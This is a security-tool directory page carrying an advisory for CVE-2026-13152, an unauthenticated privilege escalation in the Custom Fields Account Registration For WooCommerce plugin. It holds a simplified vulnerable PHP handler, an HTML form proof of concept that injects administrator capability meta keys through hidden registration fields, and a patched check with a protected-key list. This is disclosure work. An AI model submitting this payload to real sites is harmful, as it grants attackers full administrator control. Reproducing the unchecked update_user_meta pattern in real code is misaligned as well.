Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-13152 — CVE-2026-13152: Custom Fields Account Registration For WooCommerce Unauthenticated Privilege Escalation PoC & Advisory by Huynh Kien Minh (MinhHK). | Kitploit
Tools/GitHubGitHub/minhhk68/cve-2026-13152
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubminhhk68/cve-2026-13152

CVE-2026-13152

CVE-2026-13152: Custom Fields Account Registration For WooCommerce Unauthenticated Privilege Escalation PoC & Advisory by Huynh Kien Minh (MinhHK).

View Repository
1202 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Website

CVE-2026-13152: Unauthenticated Privilege Escalation in Custom Fields Account Registration For WooCommerce < 1.4

CVSS Severity Discovered By WPScan Verified

📖 Advisory Overview

CVE-2026-13152 is an unauthenticated privilege escalation vulnerability affecting the Custom Fields Account Registration For WooCommerce WordPress plugin prior to version 1.4, discovered and analyzed by security researcher Huynh Kien Minh (MinhHK). The flaw occurs because the plugin allows custom registration input fields to write directly to sensitive user capabilities metadata without sanitizing protected database keys or validating user roles. On sites using non-default database table prefixes or custom user meta key mappings, an unauthenticated user registering via the WooCommerce registration form can inject administrator privileges (such as wp_user_level or wp_capabilities) into the wp_usermeta table. This grants the newly created account full administrator access, enabling complete remote site compromise. Security researcher Huynh Kien Minh reported the vulnerability to WPScan, and the vendor resolved the issue in version 1.4 by implementing key name validation and restricting capability meta assignment.


🔗 Reference Links

  • WPScan Advisory: https://wpscan.com/vulnerability/36aaba38-3143-4e80-8386-748632ff6704/
  • Researcher Portfolio: https://minhhk.web.app/
  • GitHub Profile: https://github.com/MinhHK68

📌 Executive Summary

AttributeDetails
CVE IDCVE-2026-13152
Plugin NameCustom Fields Account Registration For WooCommerce
Plugin Slugcustom-fields-account-registration-for-woocommerce
Affected Versions< 1.4
Fixed Version1.4
Vulnerability TypeUnauthenticated Privilege Escalation (CWE-269 / OWASP A2)
CVSS v3.1 Score8.1 (High) (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Original ResearcherHuynh Kien Minh (MinhHK)
WPScan Advisory ID36aaba38-3143-4e80-8386-748632ff6704

🔍 Root Cause Analysis

The Custom Fields Account Registration For WooCommerce plugin allows site administrators to define custom input fields on the WooCommerce user registration form (my-account registration endpoint). When a new user submits the registration form, the plugin iterates over submitted form fields and calls update_user_meta($user_id, $meta_key, $meta_value) to persist user details.

The Vulnerability Mechanism

The underlying flaw resides in the input processing logic within the registration handler. The plugin fails to maintain a strict blacklist or whitelist of protected WordPress user meta keys (wp_capabilities, wp_user_level, session_tokens, wp_user_roles).

// Vulnerable registration handler logic (simplified demonstration)
add_action('woocommerce_created_customer', 'cfar_save_custom_registration_fields', 10, 3);
function cfar_save_custom_registration_fields($customer_id, $new_customer_data, $password_generated) {
    if (isset($_POST['cfar_custom_fields']) && is_array($_POST['cfar_custom_fields'])) {
        foreach ($_POST['cfar_custom_fields'] as $meta_key => $meta_value) {
            // VULNERABILITY: No check against protected meta keys like wp_capabilities or wp_user_level
            update_user_meta($customer_id, sanitize_text_field($meta_key), sanitize_text_field($meta_value));
        }
    }
}

On WordPress installations utilizing custom database prefixes or custom meta key configurations, an unauthenticated attacker can supply a custom field input matching the administrator capability key (wp_user_level = 10 or serialized array a:1:{s:13:"administrator";b:1;}). Upon account creation, update_user_meta() writes this value directly into wp_usermeta, elevating the newly registered account to full Administrator status.


💻 Proof-of-Concept (PoC)

[!CAUTION] This Proof-of-Concept is provided strictly for educational purposes, defensive auditing, and vulnerability verification. Authorized testing only.

<!-- CVE-2026-13152 PoC: Unauthenticated Privilege Escalation Payload -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>PoC - CVE-2026-13152 Privilege Escalation</title>
</head>
<body>
    <h2>CVE-2026-13152 Exploit Payload</h2>
    <form action="https://target-site.com/my-account/" method="POST">
        <input type="email" name="email" value="[email protected]" required>
        <input type="password" name="password" value="P@ssword123!" required>
        
        <!-- Malicious Meta Key Injection targeting User Level -->
        <input type="hidden" name="cfar_custom_fields[wp_user_level]" value="10">
        <input type="hidden" name="cfar_custom_fields[wp_capabilities][administrator]" value="1">
        
        <input type="submit" name="register" value="Register as Administrator">
    </form>
</body>
</html>

🛡️ Remediation & Defensive Recommendations

  1. Update Plugin Immediately: Upgrade Custom Fields Account Registration For WooCommerce to version 1.4 or higher where strict meta key validation is enforced.
  2. Implement Meta Key Blacklisting: For plugin developers, always sanitize and validate meta key input against WordPress internal reserved keys:
// Secure implementation in Version 1.4
$protected_keys = array('wp_capabilities', 'wp_user_level', 'user_level', 'session_tokens');
if (!in_array($meta_key, $protected_keys, true) && strpos($meta_key, 'wp_') !== 0) {
    update_user_meta($customer_id, $meta_key, $meta_value);
}

🏆 About the Researcher

  • Researcher Name: Huynh Kien Minh (MinhHK)
  • Experience & Expertise: Information Security Researcher specializing in WordPress ecosystem vulnerability research, SAST/DAST code auditing, and responsible disclosure.
  • Authority & Trustworthiness: Official submitter on WPScan Assigner and creator of verified security advisories and vulnerability disclosures.
  • Portfolio & Disclosures: https://minhhk.web.app/

📊 JSON-LD Structured Data Schema Markup

Download Tool